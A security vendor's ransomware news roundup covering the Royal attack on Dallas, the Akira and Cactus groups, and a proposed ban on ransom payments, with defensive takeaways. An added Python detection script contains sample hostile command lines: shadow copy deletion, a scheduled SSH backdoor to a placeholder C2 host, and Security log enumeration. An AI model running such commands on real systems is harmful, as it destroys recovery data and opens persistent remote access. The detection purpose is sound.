Ransomware Roundup: 05.15.23

Written by
Halcyon Team
Published on
May 15, 2023

Royal Ransomware Attack Continues to Cripple City of Dallas

Last week, the Royal ransomware gang claimed the City of Dallas as a victim, disrupting critical services including 911 dispatch systems.  

Emergency dispatch was still down in the Dallas 911 call center as of this weekend, with police and firefighters responding to calls by radio with no details about the incident and forced to use paper and pencil to record addresses.

“Our priority remains the restoration of public safety functions such as Computer Aided Dispatch (CAD) for 911 and 311, as well as public-facing services including websites and payment and permitting systems,” a statement by officials read.

“Each device, webpage, and system will be brought back as soon as safely possible to prevent risking any further setback.”

Some stakeholders criticized Dallas officials for not communicating adequately during the crisis.

“It’s also a serious data breach incident. We have not heard a whisper from the chief of police, the mayor, or the city manager. This should be unacceptable, but here we are,” the Dallas Police Women’s Association tweeted.

“The citizens of Dallas deserve better. The employees of Dallas deserve better. The first responders of Dallas, who put their lives on the line, absolutely deserve better. This should have never even happened. But for God’s sake- say SOMETHING.”

Takeaway: Royal is a ruthless threat actor group, and this level of disruption of emergency services and other critical operations is exactly what they are after. The more pain for the victims and the bigger the crisis they can cause, the more it works in their favor.

Critical infrastructure, services and systems have never been under more of a threat than they are today in the face of a relentless barrage of ransomware attacks. Royal specializes in targeting critical infrastructure sectors.

While many organizations have stepped up efforts to prepare for a ransomware attack by implementing controls like anti-ransomware and endpoint protection solutions, most organizations have not done the hard work of actually preparing for a ransomware attack to be successful.

In addition to prevention capabilities, organizations need to hold regular tabletop exercises where they can stress test their incident response plans and develop contingencies to account for disruptions to systems and critical services.

Key to these exercises, and fundamental to any response actions, is good communication between all stakeholders, including staff and the general public.  

A disruptive ransomware attack creates enough issues, and a timely response is of the utmost importance. Lack of visibility and clear guidelines leave those impacted in a state of confusion and anxiety.  

Clear, concise communications during a crisis like the one the City of Dallas is experiencing will enhance response efforts and reduce the anxiety these headline-making attacks generate. Everyone should know what they need to be doing, and where they can get answers.

Organizations need to plan for failure, and assume the worst in preparing for any crisis, cyberattacks included. Resilience planning for when controls fail to protect the organization is just as important as prevention planning.

Akira Ransomware Emerges with a Ransom Negotiation Chat Channel

The MalwareHunterTeam produced analysis of a newly emerged ransomware gang and variant called Akira. The group claims to have already attacked more than a dozen organizations across multiple industry verticals including education, finance, and manufacturing.

This group is not believed to be associated with another ransomware operator also called Akira that was active back in 2017, according to the researchers.

Akira modules delete Windows Shadow Volume Copies using PowerShell, and the ransomware is designed to encrypt a wide range of file types while avoiding Windows system files with .exe, .lnk, .dll, .msi, and .sys extensions.

Akira attacks thus far include data exfiltration with the threat to expose or sell the data should the victim fail to come to terms with the attackers. Akira has already reportedly leaked hundreds of gigabytes of stolen data from at least four victims.

"As for your data, if we fail to agree, we will try to sell personal information/trade secrets/databases/source codes - generally speaking, everything that has a value on the darkmarket - to multiple threat actors at ones. Then all of this will be published in our blog," the ransom note explains, per BleepingComputer.

The Akira extortion platform also includes a chat feature for victims to negotiate directly with the attackers.

“Each victim has a unique negotiation password that is entered into the threat actor's Tor site. Unlike many other ransomware operations, this negotiation site just includes a chat system that the victim can use to negotiate with the ransomware gang,” BleepingComputer reported.

Takeaway: Akira is just one of many ransomware operators to emerge recently, joining the likes of Rorschach, Cylance, Trigona, MoneyMessage, Nokoyawa and more. We’ve also seen a number of established ransomware gangs fall off the map recently, including Hive, Conti, Pysa, DoppelPaymer and REvil, to name just a few.

Some groups dissipated because a decrypter was released for their ransomware, members were arrested or operations disrupted by law enforcement, or the members simply chose to abandon a brand and reorganize under a different moniker with updated payloads and tooling.

While there is constant change in the ransomware economy, what has not changed is the fact that these criminal organizations continue to be profitable. Also, the increase in data exfiltration associated with ransomware attacks is presenting a whole other problem for victim organizations.

So, when does a ransomware attack become a ransomware attack? At initial ingress? When command & control is established? When data is exfiltrated? Or is it only a ransomware attack once the ransomware payload has been delivered?

Preventing, detecting and responding to widespread and disruptive system and data encryption creates shorter-term issues that need to be addressed, and that the organization can survive if it has prepared to be resilient.

The longer-term issue is that, even if the organization is prepared to respond to and recover from a ransomware attack, the fact that sensitive data was exfiltrated means it is exposed to brand damage, loss of intellectual property and competitive advantage in the market, and legal liability should the data be regulated.

Organizations need to think far left of “boom” when preparing to respond to a ransomware attack, because today’s more complex, multi-stage attacks are focused on data exfiltration as well as the delivery of the ransomware payload at the end of the attack sequence.

A ransomware attack begins when the threat actors identify a potential victim and begin reconnaissance. If organizations are defending adequately, the attack can be stopped at any of the preceding stages before we ever see the ransomware payload introduced, and we’d never even know it was potentially a ransomware attack.

Novel Cactus Ransomware Abuses VPNs for Persistence

A new ransomware operation has been observed targeting enterprise networks over the last two months delivering a ransomware payload dubbed Cactus by exploiting common vulnerabilities found in VPNs to gain persistence on the network.

“In all the cases investigated by Kroll, the attackers gain their initial foothold on a VPN appliance using a service account and they then deployed an SSH backdoor that connected back to their command-and-control (C2) server and was executed via a scheduled task,” CSO Online reports.

“This activity was immediately followed by network reconnaissance using a commercial Windows network scanner made by an Australian company called SoftPerfect. Additional PowerShell commands and scripts were used to enumerate computers on the network and extract user accounts from the Windows Security event log."
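The two behaviours described on this page, Akira's shadow copy deletion via PowerShell and the Cactus scheduled-task SSH backdoor followed by PowerShell enumeration of the Security event log, are both visible in process-creation telemetry. The following is an added example, not code from Halcyon, Kroll or MalwareHunterTeam: a small Python triage routine run over constructed events; the event shape, the task names and the c2.example hostname are assumptions.

```python
import re

# Constructed sample process-creation events (not telemetry from the incidents above).
# Only the command line is kept; Sysmon Event ID 1 or Windows 4688 with command-line
# auditing enabled would supply it in practice.
SAMPLE_EVENTS = [
    {"id": 1, "cmd": "powershell -c Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }"},
    {"id": 2, "cmd": "vssadmin delete shadows /all /quiet"},
    {"id": 3, "cmd": "vssadmin list shadows"},                                   # benign admin check
    {"id": 4, "cmd": 'schtasks /create /tn SysUpdate /sc minute /tr "C:\\ProgramData\\ssh.exe -N <args omitted> c2.example"'},
    {"id": 5, "cmd": 'schtasks /create /tn NightlyBackup /sc daily /tr "C:\\Backup\\run.bat"'},  # benign task
    {"id": 6, "cmd": "powershell Get-WinEvent -FilterHashtable @{LogName='Security';Id=4624} | Select-Object -ExpandProperty Properties"},
    {"id": 7, "cmd": "powershell Get-Process | Sort-Object CPU"},                # benign
]

# Each rule is a name plus a regex applied to the lower-cased command line.
# An event may match more than one rule.
RULES = [
    # vssadmin, WMIC and the WMI/CIM PowerShell paths to shadow copy deletion
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows"
                r"|wmic(\.exe)?\s+shadowcopy\s+delete"
                r"|win32_shadowcopy.*?(\.delete\(\)|remove-wmiobject|remove-ciminstance)")),
    # a newly created scheduled task whose action launches an SSH client or daemon
    ("scheduled_task_runs_ssh",
     re.compile(r'schtasks(\.exe)?\s+/create.*?/tr\s+"?[^"]*\bssh(d)?\.exe\b')),
    # PowerShell reading the Security log, the account-harvesting step Kroll described
    ("security_log_account_enumeration",
     re.compile(r"(get-winevent|get-eventlog).*?security")),
]


def triage(events):
    """Return (event id, rule name) pairs for every event whose command line matches a rule."""
    hits = []
    for ev in events:
        cmd = ev["cmd"].lower()
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((ev["id"], name))
    return hits


if __name__ == "__main__":
    for ev_id, rule in triage(SAMPLE_EVENTS):
        print(f"event {ev_id}: {rule}")
```

Events 1, 2, 4 and 6 are flagged while the benign shadow copy listing, backup task and process listing are not; in production the same rules belong in the SIEM with the command line joined to user and host context.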

Takeaway: Abusing Virtual Private Networks (VPN) and Remote Desktop Protocol (RDP) are two of the most common tactics ransomware operators use to gain persistence and move laterally within a compromised network.

RDP exploits are also used to remotely execute malicious code such as malware and attack kits, to run scripts in fileless attacks, or to abuse legitimate network tools in what is known as living off the land. Access to RDP and VPN instances is usually obtained with stolen or brute-forced user credentials.

Exploitation of unpatched vulnerabilities is also on the rise among ransomware gangs. Patching systems can be a complex process for some organizations. In order to avoid breaking critical business systems, patches often need to be applied in dev environments and tested prior to being put into production.

Even then, some issues prevent patching due to legacy systems/software or internal (home-brewed) scripts/applications that will break if the patch is applied haphazardly. Thus, there can be months or more of work to do before some vulnerabilities can be mitigated, leaving the organization exposed.

The marked increase in the exploitation of vulnerabilities by ransomware gangs is further evidence that criminal actors continue to employ increasingly complex techniques that we used to only see in state-supported operations.  

Ransomware attacks used to be clumsier and more random, basically a numbers game in which massive email spam campaigns or drive-by watering hole attacks were designed to infect as many individual devices as possible while asking for ransoms of a fraction of a bitcoin. Those days have largely passed.

But the fact that these attackers are leveraging exploits for well-documented vulnerabilities means we have the opportunity to detect and stop these ransomware operations earlier in the attack sequence. Many of the TTPs they employ are common and should help to reveal the weeks or more of detectable activity on the network that occurs before the actual ransomware payload is delivered.

The ransomware payload is the very tail-end of a longer attack, so a multi-layer defense strategy that is designed to detect more than just the detonation of a ransomware binary is critical to detecting earlier and remediating against these attacks faster.

White House Weighs Ban on Payments to Ransomware Operators

The White House is considering implementing a ban on payments to ransomware operators in an effort to reduce the financial incentives that drive disruptive and costly ransomware attacks.  

“Anne Neuberger, deputy national security advisor for cyber and emerging technologies, said Friday during a presentation at the Institute for Security and Technology’s Ransomware Task Force event,” Cybersecurity Dive reports.

“Specific conditions would warrant a waiver to the ban, especially in cases where a ransomware group is preventing the delivery of critical services, pending proper notification and permission from the pertinent government agency, Neuberger said.”

Takeaway: To pay or not to pay a ransom demand has been at the core of the issue since these threat actors began these more complex, targeted attacks against specific industries and organizations.

The simple answer is yes, ban payment of ransomware demands across the board. Ransomware attacks are (mostly) driven by financial incentives, so reducing or eliminating the financial payoffs for the attacks would certainly stifle this illicit industry.

But the answer is not that simple. In some cases, such as an attack on a hospital or on other systems controlling critical infrastructure where lives could be at risk, expediency is ostensibly the utmost concern, though not always. Paying a ransom and receiving a decryption key from the attackers is likely faster, except that most organizations don't get all their data back even with the attackers' help, so that is not a foolproof plan.

In some instances, offering a waiver to the ban also seems problematic, because if lives are potentially on the line, determining whether the incident qualifies for the waiver would likely add delay as well. There is also the data extortion issue. Even if an organization decides not to pay a ransom to restore systems, it may still be subject to extortion, because the attackers already hold stolen valuable and/or private data that they use as leverage to extract payment.

Ultimately, we need to get to a place where we are not focused on addressing a ransomware attack after sensitive data has been exfiltrated and the disruptive ransomware payload has been delivered. This means a focus on detecting these multi-stage operations earlier in the attack sequence, as well as on resilience should the attack be successful, with an emphasis on preventing data loss and extended system downtime.

Halcyon.ai is the industry’s first dedicated, adaptive security platform that combines multiple advanced proprietary prevention engines along with AI models focused specifically on stopping ransomware – talk to a Halcyon expert today to find out more. And check out the Recent Ransomware Attacks resource site to get near real-time tracking of ransomware attacks, threat actor groups and their victims.
